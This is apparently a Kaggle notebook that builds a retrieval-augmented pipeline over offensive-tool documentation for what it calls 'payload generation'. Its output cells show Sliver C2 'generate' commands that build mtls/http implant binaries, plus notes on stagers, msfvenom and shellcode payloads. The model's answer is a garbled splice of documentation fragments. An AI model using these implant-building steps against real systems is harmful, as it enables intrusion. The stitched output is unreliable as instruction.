# **Initialization**

In [1]:
!pip install langchain huggingface_hub sentence-transformers transformers langchain-community faiss-cpu faiss-gpu langchain-huggingface torch
%env PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True


Collecting langchain
  Downloading langchain-0.3.0-py3-none-any.whl.metadata (7.1 kB)
Collecting sentence-transformers
  Downloading sentence_transformers-3.1.1-py3-none-any.whl.metadata (10 kB)
Collecting langchain-community
  Downloading langchain_community-0.3.0-py3-none-any.whl.metadata (2.8 kB)
Collecting faiss-cpu
  Downloading faiss_cpu-1.8.0.post1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (3.7 kB)
Collecting faiss-gpu
  Downloading faiss_gpu-1.7.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (1.4 kB)
Collecting langchain-huggingface
  Downloading langchain_huggingface-0.1.0-py3-none-any.whl.metadata (1.3 kB)
Collecting langchain-core<0.4.0,>=0.3.0 (from langchain)
  Downloading langchain_core-0.3.5-py3-none-any.whl.metadata (6.3 kB)
Collecting langchain-text-splitters<0.4.0,>=0.3.0 (from langchain)
  Downloading langchain_text_splitters-0.3.0-py3-none-any.whl.metadata (2.3 kB)
Collecting langsmith<0.2.0,>=0.1.17 (from langchain)
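
`PYTORCH_CUDA_ALLOC_CONF` only has an effect if it is present in the environment of the kernel process before PyTorch sets up its CUDA allocator, so setting it before `import torch` is the safe choice. A variable exported inside a `!` shell escape lives only in that short-lived subshell. The following is a minimal standard-library sketch of the difference; `RAG_DEMO_FLAG` is a hypothetical variable name used only for the demonstration.

```python
import os
import subprocess

# Hypothetical variable, used only to show that a shell-level export
# does not propagate back to the Python (kernel) process.
subprocess.run("export RAG_DEMO_FLAG=1", shell=True, check=True)
leaked = os.environ.get("RAG_DEMO_FLAG")  # the child shell has already exited

# Setting the variable on os.environ changes the current process itself,
# so libraries imported afterwards in this process can read it.
os.environ["PYTORCH_CUDA_ALLOC_CONF"] = "expandable_segments:True"

print("visible after shell export:", leaked)
print("visible after os.environ  :", os.environ["PYTORCH_CUDA_ALLOC_CONF"])
```

In a notebook, the `%env NAME=value` magic has the same effect as the `os.environ` assignment.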


# **RAG + LLM for payload generation**
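
The cell below retrieves the most similar documentation chunks for a query and places them in front of the question before calling the language model. As a rough illustration of that retrieve-then-prompt flow, here is a toy sketch with no external dependencies. The word-overlap scorer is an assumption standing in for embedding similarity, and the chunk texts and function names are hypothetical.

```python
def score(query, chunk):
    """Toy relevance score: number of distinct words shared by query and chunk."""
    return len(set(query.lower().split()) & set(chunk.lower().split()))


def retrieve(query, chunks, k=1):
    """Return the k highest-scoring chunks (stand-in for a vector-store lookup)."""
    ranked = sorted(chunks, key=lambda chunk: score(query, chunk), reverse=True)
    return ranked[:k]


def build_prompt(query, retrieved):
    """Concatenate the retrieved chunks, then append the question."""
    context = "\n".join(retrieved)
    return f"{context}\n\nQuestion: {query}"


# Hypothetical mini-corpus
chunks = [
    "apples are red and grow on trees",
    "the generate command builds a binary",
    "bananas are yellow",
]
query = "example of the generate command"

top = retrieve(query, chunks, k=1)
prompt = build_prompt(query, top)
print(prompt)
```

Because the context is pasted in verbatim, both the number of retrieved chunks and the chunk size directly determine how much of the model's input budget is left for the answer.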

In [2]:
import gc
import os

import torch
from IPython.display import Markdown, display
from langchain_community.vectorstores import FAISS
from langchain_core.documents import Document
from langchain_huggingface import HuggingFaceEmbeddings
from langchain_text_splitters import MarkdownTextSplitter
from transformers import AutoModelForCausalLM, AutoTokenizer



# Load the .md files from the directory manually
def load_markdown_documents(directory: str):
    documents = []
    for filename in os.listdir(directory):
        if filename.endswith(".md"):
            filepath = os.path.join(directory, filename)
            with open(filepath, "r", encoding="utf-8") as file:
                content = file.read()
                documents.append(Document(page_content=content, metadata={"source": filename}))
    return documents

def create_retriever(documents):
    print("Starting retriever creation...")

    embeddings = HuggingFaceEmbeddings(model_name="sentence-transformers/all-MiniLM-L6-v2")
    splitter = MarkdownTextSplitter(chunk_size=400, chunk_overlap=100)
    split_docs = splitter.split_documents(documents)
    print(f"Number of documents: {len(split_docs)}")

    # Index the chunks as Documents so the "source" metadata survives retrieval
    vector_store = FAISS.from_documents(split_docs, embeddings)
    # Return the 10 most similar chunks for each query
    retriever = vector_store.as_retriever(search_kwargs={"k": 10})

    # Alternative index (not used here):
    # from langchain_community.vectorstores import Annoy
    # vector_store = Annoy.from_documents(split_docs, embeddings)
    # retriever = vector_store.as_retriever()

    print("Retriever created successfully")
    return retriever


# Load the generative model
def create_huggingface_model_local():
    global model  # kept global so optimizer_gpu() can move it between devices
    # model_name = "EleutherAI/gpt-neo-1.3B"
    # model_name = "KimByeongSu/gpt-neo-1.3B_LAMA_TREx_finetuning_MAGNET_same"
    model_name = "ricepaper/vi-gemma-2b-RAG"
    tokenizer = AutoTokenizer.from_pretrained(model_name)
    model = AutoModelForCausalLM.from_pretrained(model_name)
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    model = model.to(device)

    def generate_text(prompt, max_length=2048, temperature=0.8):
        print("Starting the model for text generation...")
        inputs = tokenizer(prompt, return_tensors="pt").to(device)
        with torch.no_grad():
            outputs = model.generate(
                inputs["input_ids"],
                attention_mask=inputs["attention_mask"],  # pass the attention mask
                max_length=max_length,    # total cap: prompt tokens plus generated tokens
                do_sample=True,           # sample instead of always taking the most likely token
                pad_token_id=tokenizer.eos_token_id,
                temperature=temperature,  # values below 1.0 sharpen the distribution
                top_k=100,                # sample only from the 100 most likely tokens
                top_p=0.95,               # nucleus sampling: smallest token set with 95% cumulative probability
                repetition_penalty=2.5,   # penalize tokens that have already appeared
                num_beams=5,              # with do_sample=True this is beam-search sampling
                early_stopping=True,      # stop once num_beams complete candidates exist
            )
        # outputs[0] holds the prompt tokens followed by the newly generated tokens
        return tokenizer.decode(outputs[0], skip_special_tokens=True)

    return generate_text

def create_rag_chain(retriever, generate_text_fn):
    def rag_chain(query):
        relevant_docs = retriever.invoke(query)

        context = "\n".join([doc.page_content for doc in relevant_docs])
        full_prompt = f"{context}\n\nQuestion: {query}"
        
        generated_text = generate_text_fn(full_prompt)
        return generated_text, relevant_docs
    
    return rag_chain

# Query the RAG system
def query_rag(chain, query):
    result, source_documents = chain(query)
    
    return result, source_documents

# Free GPU memory between queries
def optimizer_gpu():
    if not torch.cuda.is_available():
        return  # nothing to free on a CPU-only machine
    model.to("cpu")
    print("Memory after generation")
    print(f"Memory allocated: {torch.cuda.memory_allocated()}")
    print(f"Memory reserved: {torch.cuda.memory_reserved()}")
    gc.collect()              # drop unreachable Python objects first
    torch.cuda.empty_cache()  # then release cached blocks held by the allocator
    print("Memory after optimization")
    print(f"Memory allocated: {torch.cuda.memory_allocated()}")
    print(f"Memory reserved: {torch.cuda.memory_reserved()}")
    model.to("cuda")
        

# Run the system
if __name__ == "__main__":
    directory = "/kaggle/input/docs-tools"

    # Build the index and load the model once, not on every query
    documents = load_markdown_documents(directory)
    retriever = create_retriever(documents)

    # Use the local model instead of the remote endpoint
    generate_text_fn = create_huggingface_model_local()

    rag_chain = create_rag_chain(retriever, generate_text_fn)

    while True:
        query = input("Enter a query: ")
        response, docs = query_rag(rag_chain, query)

        print("Generated response:", response)

        print(f"Number of documents used: {len(docs)}")
        for j, doc in enumerate(docs, start=1):
            print(f"\nSource document {j}:", doc.page_content)

        # Display as Markdown
        i = int(input("Enter a number greater than 0 to display the response as Markdown "))
        if i > 0:
            print("         =================================================")
            display(Markdown(response))
            i = int(input("Save the output as a Markdown file? If so, enter a number greater than 0 "))
            if i > 0:
                # Save the content to the Markdown file
                filename = input("Enter the file name ")
                with open(filename, "w", encoding="utf-8") as file:
                    file.write(response)
        optimizer_gpu()
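
For a decoder-only model, `generate` returns the prompt tokens followed by the continuation, and `generate_text` decodes that whole sequence. The returned string therefore starts with the retrieved context and the question, and only then contains newly generated text. The sketch below shows the slicing idea on plain lists; the vocabulary and token ids are hypothetical stand-ins, and no model is involved.

```python
# Toy vocabulary standing in for a real tokenizer (hypothetical ids)
VOCAB = {0: "<eos>", 1: "context", 2: "Question:", 3: "hello", 4: "Answer", 5: "text"}


def decode(ids):
    """Join token strings, skipping the end-of-sequence marker."""
    return " ".join(VOCAB[i] for i in ids if VOCAB[i] != "<eos>")


def generated_only(output_ids, prompt_len):
    """Keep only the tokens that come after the prompt."""
    return output_ids[prompt_len:]


prompt_ids = [1, 1, 2, 3]
output_ids = prompt_ids + [4, 5, 0]  # prompt echo followed by the continuation

full_text = decode(output_ids)
answer_text = decode(generated_only(output_ids, len(prompt_ids)))

print("decoded in full :", full_text)
print("new tokens only :", answer_text)
```

With the objects from the cell above, the same slice would be `outputs[0][inputs["input_ids"].shape[1]:]` before calling `tokenizer.decode`. Passing `max_new_tokens` to `generate` instead of `max_length` bounds only the continuation, so a long retrieved context does not use up the generation budget.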




Starting retriever creation...



Number of documents: 6103
Retriever created successfully



Enter a query: Give me an example of how to use the generate command in Sliver.


Starting the model for text generation...
Generated response: If all you have is a Windows machine, the easiest way to build Sliver is using [WSL](https://docs.microsoft.com/en-us/windows/wsl/install-win10) and following the Linux/cross-compile instructions above. To cross-compile a native Windows binary use `make windows` and copy it to your Windows file system (i.e. `/mnt/c/Users/foo/Desktop`) and run it using a terminal that supports ANSI sequences such
```

# Sliver v1.5.x
```
sliver > generate --mtls example.com --save /Users/moloch/Desktop --os mac

[*] Generating new darwin/amd64 Sliver binary
[*] Build completed in 00:00:09
[*] Sliver binary saved to: /Users/moloch/Desktop/PROPER_ANTHONY
```
sliver > generate --http example.com --os mac

[*] Generating new darwin/amd64 implant binary
[*] Build completed in 00:00:05
[*] Implant saved to /Users/moloch/Desktop/WORKING_HACIENDA
```
sliver > generate --http example.com/foo/bar

[*] Generating new windows/amd64 implant binary


Enter a number greater than 0 to display the response as Markdown 4




If all you have is a Windows machine, the easiest way to build Sliver is using [WSL](https://docs.microsoft.com/en-us/windows/wsl/install-win10) and following the Linux/cross-compile instructions above. To cross-compile a native Windows binary use `make windows` and copy it to your Windows file system (i.e. `/mnt/c/Users/foo/Desktop`) and run it using a terminal that supports ANSI sequences such
```

# Sliver v1.5.x
```
sliver > generate --mtls example.com --save /Users/moloch/Desktop --os mac

[*] Generating new darwin/amd64 Sliver binary
[*] Build completed in 00:00:09
[*] Sliver binary saved to: /Users/moloch/Desktop/PROPER_ANTHONY
```
sliver > generate --http example.com --os mac

[*] Generating new darwin/amd64 implant binary
[*] Build completed in 00:00:05
[*] Implant saved to /Users/moloch/Desktop/WORKING_HACIENDA
```
sliver > generate --http example.com/foo/bar

[*] Generating new windows/amd64 implant binary
[*] Build completed in 00:00:05
[*] Implant saved to /Users/moloch/Desktop/IMPRESSED_METHANE
For this to work, we need the following pieces:

- a staging server (the Sliver server)
- a stage 2 payload (usually a Sliver shellcode, but can be in other formats)
- stagers (generated by `msfvenom`, the Sliver `generate stager` command, or a custom one)

## Example
```

**IMPORTANT:** The Sliver Makefile requires version information from the git repository, so you must `git clone` the repository. Using GitHub's "download zip" feature may omit the `.git` directory and result in broken builds.

This will create `sliver-server` and `sliver-client` binaries.

### Cross-compile to Specific Platforms
```
sliver > builders
Sliver implants are cross-platform, you can change the compiler target with the `--os` flag. Sliver accepts any Golang GOOS and GOARCH as arguments `--os` and `--arch`, we officially only support Windows, MacOS, and Linux, but you can at least attempt to compile for any other [valid Golang GOOS/GOARCH](https://gist.github.com/asukakenji/f15ba7e588ac42795f421b48b8aede63) combination. The `generate
# Sliver v1.6.x

- Go v1.21 or later
- `make`, `sed`, `tar`, `curl`, `zip`, `cut` commands; most of these are installed by default but you may need to install `make`, `curl`, and `zip` depending on your distribution. On MacOS you may need to install XCode and accompanying cli tools.

```asciinema
{"src": "/asciinema/compile-from-source.cast", "cols": "132"}

Question: Give me an example of how to use the generate command in Sliver.
```
sliver > generate --mtls example.com --save /Users/moloch/Desktop --os mac

[*] Generating new darwin/amd64 Sliver binary
[*] Build completed in 00:00:09
[*] Sliver binary saved to: /Users/moloch/Desktop/PROPER_ANTHONY
```
sliver > generate --http example.com --os mac

[*] Generating new darwin/amd64 implant binary
[*] Build completed in 00:00:05
[*] Implant saved to /Users/moloch/Desktop/WORKING_HACIENDA


Save the output as a Markdown file? If so, enter a number greater than 0 0


KeyboardInterrupt: 